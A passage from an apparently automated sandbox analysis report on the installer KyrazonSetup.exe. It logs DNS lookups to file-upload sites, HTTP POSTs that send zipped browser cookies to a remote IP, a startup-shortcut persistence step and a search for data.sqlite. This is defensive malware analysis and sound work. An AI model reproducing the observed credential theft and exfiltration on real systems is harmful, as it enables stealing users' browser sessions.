                                                                                    Aug 6, 2024 23:54:51.177231073 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.177243948 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.177256107 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.178177118 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.178297997 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.178803921 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.180684090 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.213709116 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.280910969 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.323141098 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:55:39.294351101 CEST5374453192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:55:39.316992044 CEST53537441.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:55:40.325319052 CEST6043953192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:55:40.347546101 CEST53604391.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.044708014 CEST5548453192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:55:41.057162046 CEST53554841.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.789307117 CEST5001553192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:55:41.808865070 CEST53500151.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.404290915 CEST5053753192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:55:42.442481995 CEST53505371.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.448359013 CEST6381953192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:55:42.466259956 CEST53638191.1.1.1192.168.2.4

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Aug 6, 2024 23:54:43.810745955 CEST192.168.2.41.1.1.10xe816Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:54:43.812508106 CEST192.168.2.41.1.1.10x52f1Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                    Aug 6, 2024 23:54:50.551229954 CEST192.168.2.41.1.1.10x6ba2Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:54:50.551552057 CEST192.168.2.41.1.1.10xf7e0Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                    Aug 6, 2024 23:55:39.294351101 CEST192.168.2.41.1.1.10xce42Standard query (0)oshi.atA (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:55:40.325319052 CEST192.168.2.41.1.1.10x5aaStandard query (0)tempfile.meA (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:55:41.044708014 CEST192.168.2.41.1.1.10x2e9cStandard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:55:41.789307117 CEST192.168.2.41.1.1.10x2dd2Standard query (0)file.ioA (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:55:42.404290915 CEST192.168.2.41.1.1.10xdfc6Standard query (0)zerostone.discloud.appA (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:55:42.448359013 CEST192.168.2.41.1.1.10x102dStandard query (0)discord.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Aug 6, 2024 23:54:43.820267916 CEST1.1.1.1192.168.2.40xe816No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:54:43.820267916 CEST1.1.1.1192.168.2.40xe816No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:54:43.821412086 CEST1.1.1.1192.168.2.40x52f1No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                    Aug 6, 2024 23:54:50.558705091 CEST1.1.1.1192.168.2.40xf7e0No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                    Aug 6, 2024 23:54:50.558928967 CEST1.1.1.1192.168.2.40x6ba2No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:54:50.558928967 CEST1.1.1.1192.168.2.40x6ba2No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:55:39.316992044 CEST1.1.1.1192.168.2.40xce42No error (0)oshi.at194.15.112.248A (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:55:39.316992044 CEST1.1.1.1192.168.2.40xce42No error (0)oshi.at5.253.86.15A (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:55:39.316992044 CEST1.1.1.1192.168.2.40xce42No error (0)oshi.at188.241.120.6A (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:55:40.347546101 CEST1.1.1.1192.168.2.40x5aaNo error (0)tempfile.me193.37.215.73A (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:55:40.347546101 CEST1.1.1.1192.168.2.40x5aaNo error (0)tempfile.me212.111.80.158A (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:55:41.057162046 CEST1.1.1.1192.168.2.40x2e9cNo error (0)api.gofile.io51.38.43.18A (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:55:41.057162046 CEST1.1.1.1192.168.2.40x2e9cNo error (0)api.gofile.io45.112.123.126A (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:55:41.808865070 CEST1.1.1.1192.168.2.40x2dd2No error (0)file.io45.55.107.24A (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:55:42.466259956 CEST1.1.1.1192.168.2.40x102dNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:55:42.466259956 CEST1.1.1.1192.168.2.40x102dNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:55:42.466259956 CEST1.1.1.1192.168.2.40x102dNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:55:42.466259956 CEST1.1.1.1192.168.2.40x102dNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                    Aug 6, 2024 23:55:42.466259956 CEST1.1.1.1192.168.2.40x102dNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • 92.246.138.20

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.44953992.246.138.20804504C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Aug 6, 2024 23:55:38.566287994 CEST483OUTPOST /storage HTTP/1.1
                                                                                    Accept: application/json, text/plain, */*
                                                                                    Content-Type: multipart/form-data; boundary=--------------------------229700368627596606758153
                                                                                    User-Agent: axios/1.7.2
                                                                                    Content-Length: 2931
                                                                                    Accept-Encoding: gzip, compress, deflate, br
                                                                                    Host: 92.246.138.20
                                                                                    Connection: close
                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 32 39 37 30 30 33 36 38 36 32 37 35 39 36 36 30 36 37 35 38 31 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 38 33 33 33 64 34 38 31 2d 34 61 65 34 2d 34 66 32 63 2d 62 63 62 39 2d 37 61 62 66 32 32 31 66 31 31 31 63 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a
                                                                                    Data Ascii: ----------------------------229700368627596606758153Content-Disposition: form-data; name="file"; filename="8333d481-4ae4-4f2c-bcb9-7abf221f111c.zip"Content-Type: application/zip
                                                                                    Aug 6, 2024 23:55:38.566287994 CEST2746OUTData Raw: 50 4b 03 04 14 00 00 08 00 00 ce 8e 06 59 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 00 00 41 70 70 6c 69 63 61 74 69 6f 6e 73 5c 50 4b 03 04 14 00 00 08 00 00 ce 8e 06 59 00 00 00 00 00 00 00 00 00 00 00 00 13 00 00 00 42 72 6f 77 73 65 72 20 45
                                                                                    Data Ascii: PKYApplications\PKYBrowser Extensions\PKYCookies\PKYq-Cookies\Google_Default.txtH9*2!Y|'6Z}Z3bX
                                                                                    Aug 6, 2024 23:55:39.209877968 CEST200INHTTP/1.1 200 OK
                                                                                    X-Powered-By: Express
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Content-Length: 2
                                                                                    ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                    Date: Tue, 06 Aug 2024 21:55:39 GMT
                                                                                    Connection: close
                                                                                    Data Raw: 4f 4b
                                                                                    Data Ascii: OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.44954392.246.138.20807896C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Aug 6, 2024 23:55:41.888885975 CEST483OUTPOST /storage HTTP/1.1
                                                                                    Accept: application/json, text/plain, */*
                                                                                    Content-Type: multipart/form-data; boundary=--------------------------784166671983596314677254
                                                                                    User-Agent: axios/1.7.2
                                                                                    Content-Length: 2931
                                                                                    Accept-Encoding: gzip, compress, deflate, br
                                                                                    Host: 92.246.138.20
                                                                                    Connection: close
                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 37 38 34 31 36 36 36 37 31 39 38 33 35 39 36 33 31 34 36 37 37 32 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 62 31 39 39 65 66 37 66 2d 34 34 64 34 2d 34 34 35 30 2d 39 31 62 65 2d 63 66 62 35 35 33 30 33 31 66 61 33 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a
                                                                                    Data Ascii: ----------------------------784166671983596314677254Content-Disposition: form-data; name="file"; filename="b199ef7f-44d4-4450-91be-cfb553031fa3.zip"Content-Type: application/zip
                                                                                    Aug 6, 2024 23:55:41.890173912 CEST2688OUTData Raw: 50 4b 03 04 14 00 00 08 00 00 d6 8e 06 59 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 00 00 41 70 70 6c 69 63 61 74 69 6f 6e 73 5c 50 4b 03 04 14 00 00 08 00 00 d6 8e 06 59 00 00 00 00 00 00 00 00 00 00 00 00 13 00 00 00 42 72 6f 77 73 65 72 20 45
                                                                                    Data Ascii: PKYApplications\PKYBrowser Extensions\PKYCookies\PKYq-Cookies\Google_Default.txtH9*2!Y|'6Z}Z3bX
                                                                                    Aug 6, 2024 23:55:41.890965939 CEST58OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 37 38 34 31 36 36 36 37 31 39 38 33 35 39 36 33 31 34 36 37 37 32 35 34 2d 2d 0d 0a
                                                                                    Data Ascii: ----------------------------784166671983596314677254--
                                                                                    Aug 6, 2024 23:55:42.451284885 CEST200INHTTP/1.1 200 OK
                                                                                    X-Powered-By: Express
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Content-Length: 2
                                                                                    ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                    Date: Tue, 06 Aug 2024 21:55:42 GMT
                                                                                    Connection: close
                                                                                    Data Raw: 4f 4b
                                                                                    Data Ascii: OK


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:17:53:59
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\KyrazonSetup.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:80'239'576 bytes
                                                                                    MD5 hash:7A84BBEADE50E7110FE8D278DC22B92D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:17:54:00
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv | "C:\Windows\system32\find.exe" "KyrazonGodot.exe"
                                                                                    Imagebase:0x240000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:17:54:00
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:17:54:00
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv
                                                                                    Imagebase:0xd50000
                                                                                    File size:79'360 bytes
                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:17:54:00
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\SysWOW64\find.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\system32\find.exe" "KyrazonGodot.exe"
                                                                                    Imagebase:0x5c0000
                                                                                    File size:14'848 bytes
                                                                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:17:54:24
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe"
                                                                                    Imagebase:0x7ff6615b0000
                                                                                    File size:172'671'488 bytes
                                                                                    MD5 hash:EEB12AAC1FF31A9D17BA437700CAF9D6
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:11
                                                                                    Start time:17:54:28
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1748 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
                                                                                    Imagebase:0x7ff6615b0000
                                                                                    File size:172'671'488 bytes
                                                                                    MD5 hash:EEB12AAC1FF31A9D17BA437700CAF9D6
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:12
                                                                                    Start time:17:54:27
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe /A:C "/F:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk" /T:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:57'344 bytes
                                                                                    MD5 hash:59375510BDE2FF0DBA7A8197AD9F12BB
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:13
                                                                                    Start time:17:54:27
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:14
                                                                                    Start time:17:54:28
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:15
                                                                                    Start time:17:54:28
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:16
                                                                                    Start time:17:54:28
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:17
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:18
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:19
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:20
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:21
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:22
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:23
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:24
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:25
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:26
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:27
                                                                                    Start time:17:54:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:28
                                                                                    Start time:17:54:30
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\where.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:where /r . data.sqlite
                                                                                    Imagebase:0x7ff7ec1b0000
                                                                                    File size:43'008 bytes
                                                                                    MD5 hash:3CF958B0F63FB1D74F7FCFE14B039A58
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:29
                                                                                    Start time:17:54:33
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --mojo-platform-channel-handle=2364 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
                                                                                    Imagebase:0x7ff6615b0000
                                                                                    File size:172'671'488 bytes
                                                                                    MD5 hash:EEB12AAC1FF31A9D17BA437700CAF9D6
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:30
                                                                                    Start time:17:54:33
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
